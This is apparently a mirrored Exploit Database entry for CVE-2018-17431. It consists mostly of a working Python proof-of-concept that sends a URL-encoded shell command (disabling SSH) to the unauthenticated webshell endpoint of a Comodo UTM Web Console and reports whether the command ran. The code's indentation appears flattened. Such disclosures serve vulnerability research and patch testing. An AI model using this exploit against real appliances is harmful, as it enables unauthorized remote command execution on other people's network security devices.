Comodo Unified Threat Management Web Console 2.7.0 – Remote Code Execution

• Exploit Database
• 18 阅读

• 作者： Milad Fadavvi
  日期： 2020-09-22
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48825/

• # Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
  # Date: 2018-08-15
  # Exploit Author: Milad Fadavvi
  # Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
  # Vendor Homepage: https://www.comodo.com/
  # Version: Releases before 2.7.0 & 1.5.0 
  # Tested on: Windows=Firefox/chrome - Kali=firefox
  # PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
  # CVE : CVE-2018-17431
  # CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
  # CVSS 3 score: 9.8 
  
  import requests
  
  def RndInt(Lenght):
  from random import choice
  from string import digits
  
  RandonInt = ''.join([choice(digits) for n in range(Lenght)])
  return str(RandonInt)
  
  if __name__ == "__main__":
  
  IP = input("IP: ")
  Port = input("Port: ")
  
  Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
  '''For more info about command try to read manual of spesefic version of Comodo UTM and 
   exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
   '''
  
  BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
  BaseNComdURL = BaseURL + "&k=" + Command
  LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13) 
  FullURL = BaseNComdURL + LastPart
  AddetionalEnter = BaseURL + "&k=%0a" + LastPart
  
  try:
  FirstResponse = requests.get(FullURL).text
  except:
  print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
  exit(1)
  
  SecondResponse = requests.get(AddetionalEnter).text
  if SecondResponse.find("Configuration has been altered") == -1:
  print("\nExploit Failed!\n")
  exit(1)
  else:
  print("\nOK! Command Ran!\n")
  exit(0)